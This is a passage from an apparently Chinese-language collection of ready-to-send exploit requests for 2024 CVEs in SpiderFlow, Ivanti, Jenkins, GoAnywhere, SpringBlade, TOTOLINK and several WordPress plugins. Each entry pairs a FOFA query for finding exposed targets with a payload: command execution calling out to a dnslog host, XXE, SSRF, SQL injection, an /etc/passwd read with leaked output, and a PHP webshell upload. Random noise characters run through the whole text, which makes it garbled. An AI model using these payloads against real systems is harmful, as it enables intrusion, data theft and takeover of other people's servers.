2 z4 r* u Z- q( G5 YCVE-2024-01952 s- \, n1 m( m
FOFA:app="SpiderFlow"9 q! G) b F/ t1 W
POST /function/save HTTP/1.1# w$ m/ E" j, o6 y2 I! t
Host: 192.168.40.130:8088& o5 W% L: g1 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 d7 S0 a+ S7 U, Z$ uConnection: close
4 q4 c: `$ G$ d7 xContent-Length: 1217 z5 ~: r, l/ Z' ] _" d; F
Accept: */*3 u0 i u7 Y, m( s) @( H: K- v
Accept-Encoding: gzip, deflate
8 }6 G6 k }9 w9 Z$ m# BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 R# Z6 A$ P; Y6 q. r
Content-Type: application/x-www-form-urlencoded; charset=UTF-8/ U: L8 b" D* r
X-Requested-With: XMLHttpRequest, }" K" J2 j- L. P
6 b3 w, |& Y6 ?# @5 b3 Kid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
' u Z' b, T9 J) M3 n# R# q5 U( ^( j" y4 U7 A, z t5 \* x- B
6 \3 w) f Z% i* O) ?99. Ncast盈可视高清智能录播系统busiFacade RCE$ ~9 s0 \% E' {" F+ [7 o. g3 ]
CVE-2024-0305
: j1 y8 d( M. v2 cFOFA:app="Ncast-产品" && title=="高清智能录播系统"
8 ]+ [. z- y# c# }8 e' D- lPOST /classes/common/busiFacade.php HTTP/1.1
" U l, r, ~5 P9 cHost: 192.168.40.130:8080
) z6 D- a) O" P( H! O: H/ oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0* V4 O( F! L+ W8 S
Connection: close
/ Q" j% N# n8 v+ C4 E8 ~Content-Length: 154: V. D# w- K4 g3 J& M$ w
Accept: */*9 e9 q7 o; z. P" G
Accept-Encoding: gzip, deflate
8 |; `' h4 |, q3 X/ G6 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, ` n4 y! U/ g Q4 o) U
Content-Type: application/x-www-form-urlencoded; charset=UTF-8; s4 A; V" `& N9 k3 W
X-Requested-With: XMLHttpRequest
) s1 o, S/ F, E5 g4 Q7 d: D0 B3 W- V E' m! X; Z
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D( Z! U* C m" w" |' C
0 Z* T! p& g0 P& ~) R& T- b( A5 Q _( D$ O) W) o2 p* P% F
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传: ]% V7 P' Q2 ^7 J, H
CVE-2024-0352' K! u2 L5 ^7 c4 j j
FOFA:icon_hash="874152924" w! |, b% w, e. N& H
POST /api/file/formimage HTTP/1.1
+ Z" f, E; _7 W- Z$ {; RHost: 192.168.40.130) c0 N1 L: q6 Y" E s4 p
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
* K9 [! |3 l1 cConnection: close
3 e: l9 p' U3 e DContent-Length: 201/ C8 ]' o2 v/ o4 X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
) x9 A) H4 a6 } t/ j- gAccept-Encoding: gzip
* i9 s6 K* }5 X( _3 v' V
9 s3 Z" @' e8 A% p' M5 k) D3 O1 \------WebKitFormBoundarygcflwtei
4 H5 {2 z+ [. q. xContent-Disposition: form-data; name="file";filename="IE4MGP.php"( A: @) a# }8 j) q5 g, d
Content-Type: application/x-php$ d: d. T' z& ?6 J- B! l# I' ?" l
3 g* J# @3 J, n, w- q9 O$ e! a) ?9 ]2ayyhRXiAsKXL8olvF5s4qqyI2O+ f+ j. X. A- U. Y+ n
------WebKitFormBoundarygcflwtei--
1 i& t1 v8 l2 w/ m
. V2 O0 q- r7 o2 ]3 Y2 } f' ^
" w+ @$ u4 B& F$ j% z8 x101. ivanti policy secure-22.6命令注入
t' q$ G, h! Z" T) nCVE-2024-21887
! F& u: S0 h4 n' n% g" b, jFOFA:body="welcome.cgi?p=logo"1 Q% U a) Z9 B5 s9 s
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.17 H1 T$ ^0 ~, V9 {8 A! ^" ]* `
Host: x.x.x.xx.x.x.x: J& }; @" s- X# K& `
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# A! v7 I f0 r9 A) _# yConnection: close0 F0 K; H% ?& n; |& m
Accept-Encoding: gzip
) o$ `8 d* o; i
( N: y' @4 A! `: K, v* G- Q9 Q+ A% M( s/ G! e# X$ F
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行( C. i; V2 S/ ?5 U( W1 O- A
CVE-2024-21893
4 K0 g6 L+ j' e& rFOFA:body="welcome.cgi?p=logo"
9 }2 O/ P+ z7 x! yPOST /dana-ws/saml20.ws HTTP/1.1$ N: ?1 u0 E0 h! G8 I. D
Host: x.x.x.x
( ]) |% e! O0 I0 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
# @* d* q$ _7 ?: Y% j: hConnection: close
1 Y6 D+ z- A4 bContent-Length: 7923 _ X; L! ]0 k0 r' a
Accept-Encoding: gzip* ^1 X, ]7 D) k/ v; W' H
( k8 n# E6 R0 R) n
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>+ f' u1 t. Z) L `/ |
1 F( a6 B# b2 x. K2 M103. Ivanti Pulse Connect Secure VPN XXE
2 |6 L0 w6 k6 t+ I* y0 H. mCVE-2024-22024' p7 E2 D) V* Q1 e! F+ a
FOFA:body="welcome.cgi?p=logo"! p! M w6 K+ R( {& M1 X
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
& L4 d% ]& h: L& d- I7 mHost: 192.168.40.130:111$ W0 R( Z. i8 d' U& v0 j( R, V, v
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.363 R2 t4 H; b+ M& k3 m2 W
Connection: close
" Y$ M/ L: I* Y# iContent-Length: 204
) Z: Q$ }6 C" J, A( @0 B% tContent-Type: application/x-www-form-urlencoded
! l1 x( R8 o! v0 w d; B1 iAccept-Encoding: gzip
: v/ j) c* T: m' Q" k2 H
/ n1 V8 {; a J! u' j+ C2 BSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
% r u2 p9 `# V0 }, h: u0 X, x5 h+ X `% G" t
& P" q8 ^) q( o- ~
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下: P( j% w! m F# R$ w% V
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>' L8 s. F0 N5 `9 w& W3 [/ j6 B
' i1 j6 e, @& A; G8 R: |
! O; t7 q6 c" Q/ L" q/ n
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
% T5 e6 n3 G( P s7 j3 GCVE-2024-0569$ ]2 W) E9 b! s6 f" N* u
FOFA:title="TOTOLINK"* l4 ^$ h u% ~. z" p' | B. ?
POST /cgi-bin/cstecgi.cgi HTTP/1.1
! h' ]! y+ H/ \Host:192.168.0.1: [+ f- [# l4 M/ U1 r% Q
Content-Length:41
% {2 z1 `6 Q5 p7 a! w ]+ FAccept:application/json,text/javascript,*/*;q=0.01
4 F5 [8 z* K9 \X-Requested-with: XMLHttpRequest* X6 v; C9 a1 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36+ Q1 l, h* u2 Y* o0 C4 J+ U
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
6 o* {+ d; k2 p' U8 B) LOrigin: http://192.168.0.1
2 Y$ P" o9 H+ c- t& \: @Referer: http://192.168.0.1/advance/index.html?time=1671152380564
* k* v8 B7 o! c& A2 W+ V7 VAccept-Encoding:gzip,deflate b3 M. R9 W# F: D( z; x4 k" B
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
3 Q2 L& G& ^5 F. ~Connection:close
" U1 j4 B; i2 K6 T8 z- K" L4 j; H0 o$ d5 t+ n: l0 ]
{& M1 |5 L3 e( p; f$ V) m E
"topicurl":"getSysStatusCfg",
2 G. C: }# v. k"token":""
6 v, ] ]4 I' R: @5 i; b3 ]8 g}
$ \& v4 ]: R) D- L$ s9 F, f+ l# D. g# _6 c: u2 y
105. SpringBlade v3.2.0 export-user SQL 注入2 o" m9 G/ Z& K2 k
FOFA:body="https://bladex.vip"
. b3 w+ N @7 \8 Xhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
$ I0 c. i7 G0 p$ g) g7 c8 y
4 W2 O! D% u/ N106. SpringBlade dict-biz/list SQL 注入
# o% F5 B3 W9 j8 cFOFA:body="Saber 将不能正常工作"3 O4 @0 `/ {: r7 i% `9 f3 h
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
/ `3 Y5 x0 p3 {1 a$ OHost: your-ip
. e1 e, A! m9 X( mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: J3 a! }3 `+ L, IBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A. O. n2 n% r$ L! ]* @+ C
Accept-Encoding: gzip, deflate7 v6 s. T2 A& v2 N6 n' g
Accept-Language: zh-CN,zh;q=0.9
# }$ X4 P# n/ L* Q, XConnection: close S( ^' w, W( I
5 Q. x# p$ i2 E. M8 L% }
: {. p" z6 Q5 C, p( z$ M5 ] y) X107. SpringBlade tenant/list SQL 注入; M) M+ b0 p$ d/ o* z, ~& e5 H1 Z
FOFA:body="https://bladex.vip"0 X% C' G8 |5 v+ U
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1. [/ T" K: ], U/ w
Host: your-ip
( C# r+ }5 e" }& C1 h- sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ |8 C5 _$ R: _8 y+ Y) s$ i
Blade-Auth:替换为自己的$ T% J z# a F, \3 E6 x
Connection: close
+ d0 g6 J1 W( _- n6 }
" ?2 Y8 B! y% s8 O
" W4 S% l7 k& q% j108. D-Tale 3.9.0 SSRF' i, Q( o3 W M! B
CVE-2024-21642' ~" s8 Z3 ^6 F8 u, Z) v) K
FOFA:"dtale/static/images/favicon.png"! H4 R$ B$ W7 P3 p& J) N6 } C' n
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1; C5 V, I |$ C
Host: your-ip
5 [" A7 z r( gAccept: application/json, text/plain, */*+ G( T5 a5 l. [6 F2 i. g6 |( p2 H/ @/ W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[: ~ P6 D% _# j5 T1 m. SAccept-Encoding: gzip, deflate
]0 G4 f7 }6 c$ n$ pAccept-Language: zh-CN,zh;q=0.9,en;q=0.8 a3 W I, c9 U: x4 D
Connection: close- U( F! r2 p' y- m; P
$ T4 ?5 g0 {% \1 y( [8 W% \* d+ V/ h& K5 W& H% n" U! r7 s5 c
109. Jenkins CLI 任意文件读取; e9 B# U& R( U* S6 F( G
CVE-2024-23897. e( p& [' Q, j+ Z
FOFA:header="X-Jenkins"
I* Q5 R3 c+ b2 y3 qPOST /cli?remoting=false HTTP/1.1
, D L, E0 U h2 Q: eHost:6 N7 v( l. _- F! }
Content-type: application/octet-stream
7 y! Y7 K& [+ B9 YSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
( w9 S, f4 e0 m3 [6 L( GSide: upload
& ]* X; x) u0 d& t, f3 j, [. rConnection: keep-alive
! |: F5 g. j8 F% |% W9 JContent-Length: 163; r* i4 w& `4 B0 v8 J6 f/ M3 z
$ O: d/ `8 ?/ Z0 H+ {7 a% f4 s( z2 A- x
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'' U# }3 \4 V7 Z$ @5 l0 P, |# p3 W
" z0 A1 s5 [. N& R- _( g" }
' H+ I+ {1 y" X& B
POST /cli?remoting=false HTTP/1.1) F, M6 k6 u- C2 l# ~
Host:( N! y( ^8 Z6 w6 [: g9 s
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92: I& W2 K' E5 M" O
download3 r" ]6 \1 ~; a+ h' q
Content-Type: application/x-www-form-urlencoded- w0 n8 ?8 W4 ^+ J# t, A' |0 e
Content-Length: 0
6 `3 F3 m) s* d, k7 K: \9 c8 B4 X7 `: R: n' i
2 w/ C u" {& }3 ?* I: z$ ?
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin9 M. p9 t% ` x9 }$ G$ J
java -jar jenkins-cli.jar help
' D# j# I5 r0 N; h' e) d[COMMAND]9 W- K& L* L6 p, L: E% r0 A
Lists all the available commands or a detailed description of single command.5 C7 Y) W" F5 |+ Z2 Z
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)2 G! l/ D$ m. s' K- p6 I- K
; B# ?9 Q; v/ ]: C
' J, p/ S' m, b2 m4 A1 O h- w+ G110. Goanywhere MFT 未授权创建管理员
: i. f& k- j" z! y8 G YCVE-2024-02045 R: e- V5 g4 m7 m9 u! }
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"- \- D( u' I& G7 t+ L: B! ^
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1! N2 b$ p0 l# ?/ P- h+ s
Host: 192.168.40.130:8000
* P t! @( W) \& pUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.361 S; z. w- F; \% c9 Z/ I! Z! f; }* @
Connection: close4 j8 b% ~* A4 _8 h- L" h9 X
Accept: */*8 o4 A% l) r5 G5 [! P) W3 [! K
Accept-Language: en
3 |8 z1 w& w' |1 {Accept-Encoding: gzip
: _, J @7 n8 C
/ q3 v, K. c6 C
1 q8 k* G' h1 m! u111. WordPress Plugin HTML5 Video Player SQL注入
4 e: q* S, o; X# g; BCVE-2024-1061: \# K, v7 |! P& r& W% V
FOFA:"wordpress" && body="html5-video-player"7 x" W' a3 Y$ `' H5 h! C6 r) d
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
; o- I9 d: F' B1 Y3 }# CHost: 192.168.40.130:1129 E# c% ~2 w, ~8 C; X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36$ c7 v% n6 n4 V/ w
Connection: close+ R, D. `' g! d
Accept: */*
" d1 p$ Y) o @* yAccept-Language: en
# E9 g' B) Q% M- E5 qAccept-Encoding: gzip; h% q: C- n" c0 Y, g! k3 e
9 d- b4 f, H3 J) E6 g3 D
) D. [+ ]/ ]) O$ V- }1 o$ L7 [4 j& c
112. WordPress Plugin NotificationX SQL 注入
+ w/ X. I8 O$ ]. k1 tCVE-2024-1698 u" C- Q+ s( \9 R; q
FOFA:body="/wp-content/plugins/notificationx"; N7 X8 g: _$ c! v" e' C
POST /wp-json/notificationx/v1/analytics HTTP/1.1* Q9 j! l5 Z" S/ g6 ]
Host: {{Hostname}}, F/ \8 ]2 \/ O2 G3 _6 e% O0 R
Content-Type: application/json9 F3 @ w1 h6 t; |+ D1 l, i$ Y4 x* Y
7 i5 j' _; f' V( k
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
. f7 \% ]# @4 Q% P3 u7 F3 o. J
3 I' Y4 k: u# Y' g
1 x- g- J/ _4 q2 w113. WordPress Automatic 插件任意文件下载和SSRF+ ^: l( l( ]2 M- ^ w# U) S2 j
CVE-2024-279544 r* Z# p+ q( \7 `& z Y' V
FOFA:"/wp-content/plugins/wp-automatic"1 \0 z' i+ r5 J+ H6 h$ J+ g4 _
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1( e' g7 M* ^) ^4 K5 [
Host: x.x.x.x$ w- t& b1 i7 A+ _8 i* s0 h- w7 \
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
6 E4 B2 |, ~, q' o9 }% wConnection: close
2 c; r _: }, L" d8 JAccept: */*
$ f9 H3 R1 N. V9 |7 J. m0 B: R" T: xAccept-Language: en. t+ `4 C+ N% E7 E! l: S4 H
Accept-Encoding: gzip+ h: x* q; W% Z- |# g0 p
3 L* a- N1 ~" T7 i
8 t; u5 @9 `% e+ j5 R114. WordPress MasterStudy LMS插件 SQL注入
A: G& X8 v$ {0 k, {FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"8 x" @4 E; {8 W! W8 g/ ?
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1 y: z2 T8 n' c" I3 W! G
Host: your-ip8 r6 M8 R. t3 N0 o( D. D
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36& E% f7 y+ e/ Q+ o! s3 l! H
Accept-Charset: utf-88 i @; `1 [: M/ X
Accept-Encoding: gzip, deflate
' M! ?2 f0 n. N& h& j3 H2 o* ?Connection: close" w, U$ ?; L7 T- `
% M( i/ Y/ w1 Y
4 u7 z- b' |8 ]& K) Y2 Y4 A ]115. WordPress Bricks Builder <= 1.9.6 RCE
. c1 z3 y) B( \1 HCVE-2024-25600
0 C9 O3 d- U) D$ T# c3 cFOFA: body="/wp-content/themes/bricks/"7 k- u8 d7 ^& g7 R9 [) c" J6 R+ p
第一步,获取网站的nonce值) O; R7 q$ S$ s. W3 N0 Q" C7 }
GET / HTTP/1.1
2 p& K# k: R- F% n0 YHost: x.x.x.x: a% f1 C) c0 G0 ]9 U$ X8 n
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 |1 H' S0 m* r' w& p5 R* ~, o
Connection: close
* o- X1 B& S5 _5 r+ p9 R$ m1 CAccept-Encoding: gzip
. z `& J1 n6 s* F" N
: O/ }' s' C, j2 G$ y/ G' ~, t( C
& j. j3 t: n; [# U$ U第二步替换nonce值,执行命令
9 e* `* q% B1 K6 ]" n: Y) TPOST /wp-json/bricks/v1/render_element HTTP/1.1
6 t: ?1 N1 U. \+ ?8 S, C# c- \. [Host: x.x.x.x+ Y5 F( X0 r" U6 E) L$ u" p/ I) U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
+ N( G+ y1 d8 g# e( lConnection: close
* q7 M: z K0 J9 S+ g; r% XContent-Length: 356% E) A. S0 g4 E8 ]5 M
Content-Type: application/json
3 Z4 J$ O" G9 M! {2 yAccept-Encoding: gzip
$ A6 R* V; B+ N8 A/ S: p
3 ~# ]$ S* |8 }, z' B/ `! I- z{" G0 h1 u6 f: Q# Q
"postId": "1",
% n5 i: g% N0 P) D4 h "nonce": "第一步获得的值",- Q% e! h% r- h6 w
"element": {0 f8 Y) ?9 W! t) S0 J
"name": "container",
; a1 m1 m+ u. @ "settings": {
; \5 w7 d6 j0 C* g0 I "hasLoop": "true",
- u2 K9 G: P! b, l8 X "query": {
) p# H3 U' S, ~. E% n, W "useQueryEditor": true,
, H. Z7 P! _: Z/ e. w1 k "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",/ N, s' O* Y) X
"objectType": "post"* P# ?; y+ l1 \" J( T) `; L* F$ E
}
# ^& W" ~* j6 g* L }
8 X: ], p( f, L }5 v; K4 M3 {4 F+ e H
}
( ^; Y5 H/ `# a/ t8 }$ C7 |" t7 ~0 K- Y, _& ~0 W
5 P" k# B W7 _, h: ~116. wordpress js-support-ticket文件上传
- w7 W4 x# Z$ [' g0 e$ E( t* [/ RFOFA:body="wp-content/plugins/js-support-ticket"
8 E4 t, G; f$ ^! H# oPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
, x! L- O; M3 r; BHost:
6 U% K$ Z/ c9 ~% i: E0 \3 DContent-Type: multipart/form-data; boundary=--------767099171
, b) c9 z% ]$ VUser-Agent: Mozilla/5.08 C/ j k# B. p4 x i, P6 Y
7 D1 j# X# R; G4 w
----------767099171
# n, g0 K8 H5 L4 oContent-Disposition: form-data; name="action"* Y9 `2 ~$ ~8 h- }2 Y
configuration_saveconfiguration$ I' U: t% i2 _( F
----------767099171
, A8 n" l. C% H5 dContent-Disposition: form-data; name="form_request"5 I4 K' l9 ~1 j1 l O: v5 j6 v* ^ [0 o
jssupportticket1 Q7 ?( |3 F& v+ F* ?4 {$ g8 {
----------767099171* t1 P) G* S' |. A+ D
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"3 x# d. j5 X7 x& y2 g* J7 j: q
Content-Type: image/png/ o$ s# i* S" V2 t, a3 Q! f
----------767099171--
9 l+ c) N8 c- P$ W: t9 p
+ X- z& ^# N7 f0 Y. B
" v e q; g' M' U117. WordPress LayerSlider插件SQL注入4 p0 z( Z$ f" [7 j P9 b# e. p+ T
version:7.9.11 – 7.10.0
: B, d' f( t; i7 y( ]FOFA:body="/wp-content/plugins/LayerSlider/"
- i* T+ p+ e( e) O8 G1 ZGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
* ~" k. t# p$ ?" w, FHost: your-ip. o$ w; Y/ c% p" V A- ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( X1 [3 w% S" N( S2 I. ?0 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% P* Y! v9 v5 L1 w" |) B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) B' I6 ?# t4 M) VAccept-Encoding: gzip, deflate, br, o8 \; b6 n, C. i1 l5 q
Connection: close$ }$ V4 } e4 ~" T2 ^& e2 N
Upgrade-Insecure-Requests: 1
" X! D2 z9 _) [( I) K/ |! H$ r( Z3 D$ L% w$ Y. o5 O7 M W
: Y- y5 p Q. Q% ^# B+ r: L
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
' m- M9 m4 ~! ` }CVE-2024-0939
$ R1 h- ^7 \% AFOFA:title="Smart管理平台"" K9 x4 |5 O" C, p& j- X V
POST /Tool/uploadfile.php? HTTP/1.1
3 f( R' A% S P2 Z, K) n" uHost: 192.168.40.130:8443
. I4 Y$ ^* o+ Q7 DCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
6 _& A9 w- b; E, ~, r$ ]0 M3 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
+ e- |! t% b, u! G9 j! QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 ^+ m m; C; A1 z( ^$ h5 |5 M9 ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* D7 ~0 r! \$ M3 M
Accept-Encoding: gzip, deflate
/ ~: ]& W: E: IContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
& V- n& D0 s" v! ~Content-Length: 405
2 J8 y- e1 m( ^1 C9 qOrigin: https://192.168.40.130:8443
9 n% S0 b1 ?. M: z( cReferer: https://192.168.40.130:8443/Tool/uploadfile.php
; }# O$ i$ J" y' Q6 tUpgrade-Insecure-Requests: 1
! @7 q/ a; P/ H7 b( E- Y1 }+ Q2 }Sec-Fetch-Dest: document
7 Y: P3 r; c7 K1 ]6 k* v# lSec-Fetch-Mode: navigate. G# e7 i; Y2 _! c
Sec-Fetch-Site: same-origin6 e0 l# N& N' ^6 S4 W; G
Sec-Fetch-User: ?1$ T! h& v% y% k. ^" f3 n( Y
Te: trailers
9 J* e5 r8 K( I0 o! _% NConnection: close
: M5 ~- w' I6 P+ m) q$ `* J. w
3 ~8 A! ]( i1 j% u1 B-----------------------------13979701222747646634037182887( M0 r% J4 H/ t
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
* ~! `8 }7 e/ Y0 q7 u+ c' U) hContent-Type: application/octet-stream
! u- U- q8 K! U6 C" K$ ]
5 I R1 K0 `3 ?7 g) G<?php
" a; K' R | }% Hsystem($_POST["passwd"]);
( k7 c# h8 N4 x& _, z, H3 `?>- F3 o" i( h& E+ H
-----------------------------139797012227476466340371828876 S4 U/ G& W% Y. N. C) ?
Content-Disposition: form-data; name="txt_path"
* N' @& [0 B+ `. X
/ F6 l5 _ x; z6 R: H& N/home/src.php
. [: o$ F: s3 o8 @% u: I-----------------------------13979701222747646634037182887--
# [& {: w* v2 b2 R- w* |4 A! n: ~7 u% O5 Y
1 m) Y! W* \4 t7 H访问/home/src.php$ k* o" b4 ~" \2 e8 K, [ b
e/ h& l# f7 L/ X; s- J# P: z
119. 北京百绰智能S20后台sysmanageajax.php sql注入. a9 c. Y3 S, u
CVE-2024-1254; y0 V ^, e5 `5 Q0 y3 T
FOFA:title="Smart管理平台"4 D6 K# f# e5 n$ ?8 D6 @
先登录进入系统,默认账号密码为admin/admin
7 ?' j" X8 f% K" y! PPOST /sysmanage/sysmanageajax.php HTTP/1.11
8 l% x; d! A! I, X- NHost: x.x.x.x$ ]; W6 ~5 Y7 V, Y6 [
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
. k" O" Y, W1 |0 w2 x$ k: {$ |6 n' mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 l: P! l. m" z( m" v3 F* T
Accept: */*
6 r* ~1 f. k% y5 u6 nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 @3 k( k4 |+ b E+ Y& t6 iAccept-Encoding: gzip, deflate) e2 t' O# ]. K2 @5 Q0 D9 j" ]0 E
